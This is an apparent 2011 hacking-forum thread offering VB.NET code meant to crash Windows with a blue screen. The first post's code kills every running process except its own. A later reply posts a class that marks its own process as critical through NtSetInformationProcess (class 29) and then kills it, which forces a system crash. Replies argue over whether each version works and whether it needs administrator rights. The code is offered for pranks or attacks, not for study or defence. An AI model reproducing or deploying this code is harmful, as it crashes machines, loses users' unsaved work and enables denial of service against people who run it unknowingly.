Support Forums

Full Version: [TuT] BSOD Triggering Program
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
1. Make a new application.
2. Place a button on the form.
3. Put this code into the button:
Code:
For Each I In Process.GetProcesses
    Try
    If Not I.ProcessName = Application.ExecutablePath.Split("\")(Application.ExecutablePath.Split("\").Length - 1).Split(".")(0) Then
    I.Kill()
    End If
    Catch ex As Exception
    End Try
  Next

Run it and press the button, you will get a nice BSOD Smile

Code:
If Not I.ProcessName = Application.ExecutablePath.Split("\")(Application.ExecutablePath.Split("\").Length - 1).Split(".")(0) Then

you didn't need all that extra typing lol. This could have been used as well:
Code:
Path.GetFileName(Application.ExecutablePath)
As long as you Import the System.IO namespace, otherwise, you're going to have to put it directly in there like this:
Code:
IO.Path.GetFileName(Application.ExecutablePath)

Or you could have just split it at the last index of "\" instead, also it's only accurate for form applications. But it wouldn't work for a module or a service.

But this is only accurate for windows form applications (executables), and it wouldn't be very good to use for a service or a module.
Use this instead of the code above:
Code:
Dim AppProcess As String = Process.GetCurrentProcess.MainModule.FileName
(07-03-2011, 03:30 AM)Ace Wrote: [ -> ]
Code:

you didn't need all that extra typing lol. This could have been used as well:
Code:
Path.GetFileName(Application.ExecutablePath)
As long as you Import the System.IO namespace, otherwise, you're going to have to put it directly in there like this:
Code:
IO.Path.GetFileName(Application.ExecutablePath)

Or you could have just split it at the last index of "\" instead, also it's only accurate for form applications. But it wouldn't work for a module or a service.

But this is only accurate for windows form applications (executables), and it wouldn't be very good to use for a service or a module.
Use this instead of the code above:
Code:
Dim AppProcess As String = Process.GetCurrentProcess.MainModule.FileName

LOL... So what is it doing technically?... Explain please Ace
(07-03-2011, 01:48 PM)Resistance Wrote: [ -> ]LOL... So what is it doing technically?... Explain please Ace

It kills every process other than the one that is currently working.
(07-03-2011, 04:59 PM)cody8295 Wrote: [ -> ]It kills every process other than the one that is currently working.

That is an unwise decision to make! It needs administrator privileges to function, no?
(07-03-2011, 05:02 PM)Resistance Wrote: [ -> ]That is an unwise decision to make! It needs administrator privileges to function, no?

Only one way to find out.
(07-03-2011, 05:02 PM)Resistance Wrote: [ -> ]That is an unwise decision to make! It needs administrator privileges to function, no?

I doubt that it would cause a BSOD either, as you typically can't even delete the important processes anyway even with admin privilleges though. And some can't be deleted because they are in use, and will start back up upon killing it's process.

(07-03-2011, 01:48 PM)Resistance Wrote: [ -> ]LOL... So what is it doing technically?... Explain please Ace

You should have been able to figure that out. The first 3 are the same, only the last is the shortest, and the best method is the last one, as it doesn't just look for a filepath to an executable form. Not all services are executables in forms

real bsod try this :

Code:
'Release Date   :   10/5/2010
'Credits        :   AeonHack,Devil's Child,Wrox Programming
'Purpose    :   Instant Bluescreen Of Death(BSOD)

Imports System
Imports System.Diagnostics
Imports System.Runtime.InteropServices

Public Class mBlueScreen

<DllImport("ntdll")> _
    Shared Function NtSetInformationProcess(ByVal p As IntPtr, ByVal c As Integer, ByRef i As Integer, ByVal l As Integer) As Integer
    End Function

Public Shared Sub BSOD()
        Dim mProc As Process = Process.GetCurrentProcess()
        NtSetInformationProcess(mProc.Handle, 29, 1, 4)
        mProc.Kill()
    End Sub

End Class
(07-04-2011, 06:39 PM)t0fxREAL Wrote: [ -> ]real bsod try this :

Code:

Imports System

Public Class mBlueScreen

<DllImport("ntdll")> _
    Shared Function NtSetInformationProcess(ByVal p As IntPtr, ByVal c As Integer, ByRef i As Integer, ByVal l As Integer) As Integer
    End Function

Public Shared Sub BSOD()
        mProc.Kill()
    End Sub

End Class

All you need for imports on the code I see is
Code:

The rest is useless, but that's not going to give you a real bluescreen, killing the process of that dll if you managed wouldn't be the same as deleting it. Although i'd advise not to.
(07-04-2011, 06:54 PM)Ace Wrote: [ -> ]
(07-04-2011, 06:39 PM)t0fxREAL Wrote: [ -> ]real bsod try this :

Code:

Imports System

Public Class mBlueScreen

<DllImport("ntdll")> _
    End Function

Public Shared Sub BSOD()
        mProc.Kill()
    End Sub

End Class

All you need for imports on the code I see is
Code:

The rest is useless, but that's not going to give you a real bluescreen, killing the process of that dll if you managed wouldn't be the same as deleting it. Although i'd advise not to.

I know that, it's just a c/p with credits, search my codes u'll never find useless declarations.